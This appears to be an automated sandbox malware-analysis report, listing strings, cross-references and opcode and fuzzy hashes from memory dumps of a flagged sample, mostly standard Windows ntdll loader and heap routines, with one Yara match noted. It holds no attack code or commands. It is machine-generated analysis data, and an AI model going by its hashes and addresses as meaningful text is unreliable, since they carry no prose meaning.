                                                    • Critical section address., xrefs: 011B5502
                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B540A, 011B5496, 011B5519
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                    • API String ID: 0-2368682639
                                                    • Opcode ID: e364782040ba47d618120cd20e672b1f40e168984ca49ffe3e22d634c53d2e61
                                                    • Instruction ID: 1094ec94fc61aa333bd0eebb7f3223972d6588d09c2fbfb1dc0df6eb36e094fd
                                                    • Opcode Fuzzy Hash: e364782040ba47d618120cd20e672b1f40e168984ca49ffe3e22d634c53d2e61
                                                    • Instruction Fuzzy Hash: 3B818AB0A41359EFEB68CF99C889BAEBBF6FB48714F104119F504B7250D3B5A941CB60
                                                    Strings
                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011B2506
                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011B2498
                                                    • @, xrefs: 011B259B
                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011B2602
                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011B2412
                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 011B261F
                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011B22E4
                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011B25EB
                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011B24C0
                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011B2624
                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011B2409
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                    • API String ID: 0-4009184096
                                                    • Opcode ID: b84b9d961732211797afe29bc486f4b076eff6395c28efe906d7910b46bc2e26
                                                    • Instruction ID: 4b09d52678da1365dae56274f0477491283c3dcdfde389006128025be5ac71e2
                                                    • Opcode Fuzzy Hash: b84b9d961732211797afe29bc486f4b076eff6395c28efe906d7910b46bc2e26
                                                    • Instruction Fuzzy Hash: AE0271F1D002299BDB39DB54CC80BEAB7B8AF54704F0141DAE649A7241EB70AF85CF59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                    • API String ID: 0-2515994595
                                                    • Opcode ID: f480fcc3edbb1342687c5f1fdd1eb58b3f980e834b222a24f3f30425d477d528
                                                    • Instruction ID: c6444ed944b677fc2bc4e6e00346fd60bb3ab61a71b08f2dabf0c7e25c681d80
                                                    • Opcode Fuzzy Hash: f480fcc3edbb1342687c5f1fdd1eb58b3f980e834b222a24f3f30425d477d528
                                                    • Instruction Fuzzy Hash: 5051EF71104B019BC32DDF588848BABBBECFF99654F14492DFA99C3284E771D608CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    • Opcode ID: 7529bc2a1fc94893d8ee0b9d80f065d62d3081eba68a544f18be6a5e6f0eb4a8
                                                    • Instruction ID: 1ee0ed4f0c99463773f69962d42e145576979f469d67e7a59c6e908772ba4d17
                                                    • Opcode Fuzzy Hash: 7529bc2a1fc94893d8ee0b9d80f065d62d3081eba68a544f18be6a5e6f0eb4a8
                                                    • Instruction Fuzzy Hash: 4BD1FB31604682DFDB2EDF68C405AAABBF2FF8A714F09805DF6459B252E734D981CB14
                                                    Strings
                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011C8A3D
                                                    • HandleTraces, xrefs: 011C8C8F
                                                    • VerifierDebug, xrefs: 011C8CA5
                                                    • VerifierFlags, xrefs: 011C8C50
                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011C8A67
                                                    • AVRF: -*- final list of providers -*- , xrefs: 011C8B8F
                                                    • VerifierDlls, xrefs: 011C8CBD
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                    • API String ID: 0-3223716464
                                                    • Opcode ID: 30c91f7e8cf98be009e675d879ca8682e6ecb023c7f8a3ab6c8a998e4acebb73
                                                    • Instruction ID: bf1a8844659b51b5028d5942862fc407f8fecc39a7276ba669431673e69a2b1c
                                                    • Opcode Fuzzy Hash: 30c91f7e8cf98be009e675d879ca8682e6ecb023c7f8a3ab6c8a998e4acebb73
                                                    • Instruction Fuzzy Hash: E79137B1645712AFD72DDF68E8C4B6AB7E4ABA4F18F06041CFA446B240C770DD01CB96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                    • API String ID: 0-1109411897
                                                    • Opcode ID: a2badc4d905e5bee24e6d261ec015d63d9603a6b88d03c60b1b44a61e9292568
                                                    • Instruction ID: fc073f29a676e61315858f50ea94ba9b4cc33ba637fa02e2d133ea414e933c4b
                                                    • Opcode Fuzzy Hash: a2badc4d905e5bee24e6d261ec015d63d9603a6b88d03c60b1b44a61e9292568
                                                    • Instruction Fuzzy Hash: FFA25774A0562ACFDB68CF18C888BA9BBB1BF45704F5442E9D90DA7750DB749E81CF01
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-792281065
                                                    • Opcode ID: dba52b7e7c4d2f232d10c64b0042aa14d2be0a0e8c491ee31dd058e776b28608
                                                    • Instruction ID: 0b52620588a08be65255da9c503581000860f6b6bbe73c198c4837f34711cdc4
                                                    • Opcode Fuzzy Hash: dba52b7e7c4d2f232d10c64b0042aa14d2be0a0e8c491ee31dd058e776b28608
                                                    • Instruction Fuzzy Hash: 04913770B00B15ABFB2DDF18F888BEA7BB1BF51B18F044168E5066B782D7749801C791
                                                    Strings
                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01199A2A
                                                    • apphelp.dll, xrefs: 01136496
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01199A11, 01199A3A
                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01199A01
                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011999ED
                                                    • LdrpInitShimEngine, xrefs: 011999F4, 01199A07, 01199A30
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-204845295
                                                    • Opcode ID: 69590ee9e5b0bfe99282936aedfeb668c0c3bdaecc9dcb7d42785a19dbbdbb58
                                                    • Instruction ID: 2beaacda1fadfe62b963978a5dab22eee1708115b79464e24b0d84be65f08692
                                                    • Opcode Fuzzy Hash: 69590ee9e5b0bfe99282936aedfeb668c0c3bdaecc9dcb7d42785a19dbbdbb58
                                                    • Instruction Fuzzy Hash: CC519171208305AFEB2DDF24D845BAB77E8FB84648F00492DE59597194E734EA44CB93
                                                    Strings
                                                    • SXS: %s() passed the empty activation context, xrefs: 011B2165
                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011B219F
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011B2178
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011B2180
                                                    • RtlGetAssemblyStorageRoot, xrefs: 011B2160, 011B219A, 011B21BA
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011B21BF
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                    • API String ID: 0-861424205
                                                    • Opcode ID: 65e97a0a7081400adace87d87a39dd498900bcd8fbf3484fd12e0eec31a6afdb
                                                    • Instruction ID: f8cc2e2e5ceb6e3c2ba68e1df5619b0dc3d973aabefa0f0ed59074d2ae4ccbb2
                                                    • Opcode Fuzzy Hash: 65e97a0a7081400adace87d87a39dd498900bcd8fbf3484fd12e0eec31a6afdb
                                                    • Instruction Fuzzy Hash: 8C31FB36F4022577F72D8A998C86F9BBB79DB75A90F05405DFB04B7241D370AA02C7A1
                                                    Strings
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 011B81E5
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 011B8181, 011B81F5
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0117C6C3
                                                    • Loading import redirection DLL: '%wZ', xrefs: 011B8170
                                                    • LdrpInitializeProcess, xrefs: 0117C6C4
                                                    • LdrpInitializeImportRedirection, xrefs: 011B8177, 011B81EB
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-475462383
                                                    • Opcode ID: e25ca7722a948e6020a81606f014410bad7bd9bc00aa600c42939b7fee91f237
                                                    • Instruction ID: 65e6007e50023a77f4a2600a0ecb46e951c06d7976bd8484261e4e173f589800
                                                    • Opcode Fuzzy Hash: e25ca7722a948e6020a81606f014410bad7bd9bc00aa600c42939b7fee91f237
                                                    • Instruction Fuzzy Hash: 5631F571644346AFD21CEF29D886F5A77E8EF94B18F04055CF944AB391E720ED04CBA2
                                                    APIs
                                                      • Part of subcall function 01182DF0: LdrInitializeThunk.NTDLL ref: 01182DFA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180BA3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180BB6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180D60
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180D74
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                    • String ID:
                                                    • API String ID: 1404860816-0
                                                    • Opcode ID: 9bea629e25fa8ab0c753fe9f3cb134865eff84d677fdbb494ff52f4467eb3211
                                                    • Instruction ID: 0ea613a75771d0ce09003bd1c7241e3604afd231a4843f1312b0ee1184b8f5a9
                                                    • Opcode Fuzzy Hash: 9bea629e25fa8ab0c753fe9f3cb134865eff84d677fdbb494ff52f4467eb3211
                                                    • Instruction Fuzzy Hash: DE427D71900719DFDB69DF28C880BEAB7F4BF48304F1485A9E989DB241E770A985CF61
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    • Opcode ID: e702f423aa5e9e9330106ae61e6fe37c88a4e02394a16fd4f4c4d3c8b58a39fa
                                                    • Instruction ID: b77db27a0d16c4efe650ac20fb7a555480fd41aeca44d3881e5b0ce9f5aec3fc
                                                    • Opcode Fuzzy Hash: e702f423aa5e9e9330106ae61e6fe37c88a4e02394a16fd4f4c4d3c8b58a39fa
                                                    • Instruction Fuzzy Hash: F6C1AD75148382CFD719CF58D144B6ABBE4FF84B04F0A886AF9968B251E734C949CB93
                                                    Strings
                                                    • @, xrefs: 01178591
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0117855E
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01178421
                                                    • LdrpInitializeProcess, xrefs: 01178422
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1918872054
                                                    • Opcode ID: 4af0f1cd7df60659ddeb99c3e644d79189176b4cfd99b63b4a7439b3e2b30198
                                                    • Instruction ID: 0cc9c0e623cb9648a0485771a7bb96694d86de721431af12dbb8e28fec40e51a
                                                    • Opcode Fuzzy Hash: 4af0f1cd7df60659ddeb99c3e644d79189176b4cfd99b63b4a7439b3e2b30198
                                                    • Instruction Fuzzy Hash: 96918E71508345AFD72AEF65CC84FABBAECBF84744F40492EFA8492251E770D944CB62
                                                    Strings
                                                    • .Local, xrefs: 011728D8
                                                    • SXS: %s() passed the empty activation context, xrefs: 011B21DE
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011B22B6
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011B21D9, 011B22B1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    • API String ID: 0-1239276146
                                                    • Opcode ID: 1228fda842fd1646480b35f92ff4b469a638b845ffd54236f1b72c787c7acf41
                                                    • Instruction ID: daf5065e9f4b46fb99c2377e4d136b352bf7d44da9a9bc9135cf24b9ea346de2
                                                    • Opcode Fuzzy Hash: 1228fda842fd1646480b35f92ff4b469a638b845ffd54236f1b72c787c7acf41
                                                    • Instruction Fuzzy Hash: B1A1A131900229DBDB2DCF68C884BE9B7B1BF58354F1941E9D908A7351E730AE86CF91
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011A1028
                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011A106B
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011A0FE5
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011A10AE
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    • API String ID: 0-1468400865
                                                    • Opcode ID: a396523a9e4b1102051993e47eb1bac0871c3f5f051dafd3a1efd73a676bae6f
                                                    • Instruction ID: af60f0beddf2ab8bf0f54582d4f65d9741a1447226de04cf5f50f44b571e1be6
                                                    • Opcode Fuzzy Hash: a396523a9e4b1102051993e47eb1bac0871c3f5f051dafd3a1efd73a676bae6f
                                                    • Instruction Fuzzy Hash: 6871F2B1904345AFCB25EF14C884B977FA9AF95BA8F400468F9488B146D334D589CFD2
                                                    Strings
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011AA992
                                                    • apphelp.dll, xrefs: 01162462
                                                    • LdrpDynamicShimModule, xrefs: 011AA998
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 011AA9A2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    • Opcode ID: 0d60422ef3c5f6ec6afb91d45022a43e96d8beacbe08fc3ec02141c9a9959912
                                                    • Instruction ID: 90179b60e5f43f77ff011686619fb6e94bfa24dc02cf1535bf96dc5bca196c32
                                                    • Opcode Fuzzy Hash: 0d60422ef3c5f6ec6afb91d45022a43e96d8beacbe08fc3ec02141c9a9959912
                                                    • Instruction Fuzzy Hash: 67314A75A00302EBDB3DDF5DF849AAA7BB8FF84B04F560019E9016B245D7B09A51C780
                                                    Strings
                                                    • HEAP[%wZ]: , xrefs: 01153255
                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0115327D
                                                    • HEAP: , xrefs: 01153264
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                    • API String ID: 0-617086771
                                                    • Opcode ID: ef0f8e6786c4fcae9a3c61e1415f5cc4033c22e5e7ec18bb7276eff0a7f6843e
                                                    • Instruction ID: 30b106aeb0594844bc1be1afcf5382d15366eb4470cb0e781840db42d4839b26
                                                    • Opcode Fuzzy Hash: ef0f8e6786c4fcae9a3c61e1415f5cc4033c22e5e7ec18bb7276eff0a7f6843e
                                                    • Instruction Fuzzy Hash: 0D92CD71A04649DFDB69CF68C444BAEBBF1FF48304F188099E869AB392D735A941CF50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    • Opcode ID: 908931b0760e9dba248d2600aa7d20a7afaa230a48b3c658910a0c9cb2830385
                                                    • Instruction ID: db1c5803d1f09615b81dcc20321786901511def1105587d2025faa09cfe240f9
                                                    • Opcode Fuzzy Hash: 908931b0760e9dba248d2600aa7d20a7afaa230a48b3c658910a0c9cb2830385
                                                    • Instruction Fuzzy Hash: CFF1CF34A04606DFDB5DCFA8C894F6ABBB2FF48304F154169E8269B385D730E981CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: =$www.$www.
                                                    • API String ID: 0-3343787489
                                                    • Opcode ID: 5b611f8e9ee1ff1bdd803b53837493fe3bf719a643394e8cde68045fe36adc92
                                                    • Instruction ID: 4b1b4fca41e8a1c2719216c0780adceb2e1f60683be9f149266314501c592d8c
                                                    • Opcode Fuzzy Hash: 5b611f8e9ee1ff1bdd803b53837493fe3bf719a643394e8cde68045fe36adc92
                                                    • Instruction Fuzzy Hash: 40C1B7B5944208AAD715DBF0CCC2FDBB77CAF04308F00455EF6595B182DB78A688CBA9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: $@
                                                    • API String ID: 2994545307-1077428164
                                                    • Opcode ID: bf4ac688bff722c6a30086bc082393dd0ea3ac0ddf975a54b39c28257abbf2d7
                                                    • Instruction ID: 25b0c107251edd5e85a15c9d4409c9d08786f6f2b264978d128ae399fe147692
                                                    • Opcode Fuzzy Hash: bf4ac688bff722c6a30086bc082393dd0ea3ac0ddf975a54b39c28257abbf2d7
                                                    • Instruction Fuzzy Hash: 72C290716083419FE72DCF28C840BABBBE9BF88758F05892DE989C7241D735D855CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    • Opcode ID: b4040c4afc4d39d86dc56980d40282212a6db0548d3ed2f46cda3e4722747f5a
                                                    • Instruction ID: d77fd4eb2d43b743ef2a8ce176eb722d71ac0023582c689684abf198f92a7ad9
                                                    • Opcode Fuzzy Hash: b4040c4afc4d39d86dc56980d40282212a6db0548d3ed2f46cda3e4722747f5a
                                                    • Instruction Fuzzy Hash: EAA15B719112299BDF39DF28CC88BEAB7B8EF48704F1041E9E958A7250D7359E84CF90
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 011AA121
                                                    • LdrpCheckModule, xrefs: 011AA117
                                                    • Failed to allocated memory for shimmed module list, xrefs: 011AA10F
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-161242083
                                                    • Opcode ID: 900fc82bbc5168ec6e77f09f56ead6c487a643bc8cbad5c224907f9756f96fe4
                                                    • Instruction ID: f76b9eec6cfdab87bb681e555d9102d476372708040891c6b5e54b458ab83c50
                                                    • Opcode Fuzzy Hash: 900fc82bbc5168ec6e77f09f56ead6c487a643bc8cbad5c224907f9756f96fe4
                                                    • Instruction Fuzzy Hash: 5571F074A00205EFDB2DDF68D984ABEBBF8FF48204F04446DE8029B245E735AE51CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-1334570610
                                                    • Opcode ID: 53997cab687ddf5c393208f9639b04672ed1f254354be8e57b268f2e8d3d9668
                                                    • Instruction ID: 9abeb2f69266cfedd0ff905cfeaf06d1a2ddb08d38932febca4b63b87dcfe92e
                                                    • Opcode Fuzzy Hash: 53997cab687ddf5c393208f9639b04672ed1f254354be8e57b268f2e8d3d9668
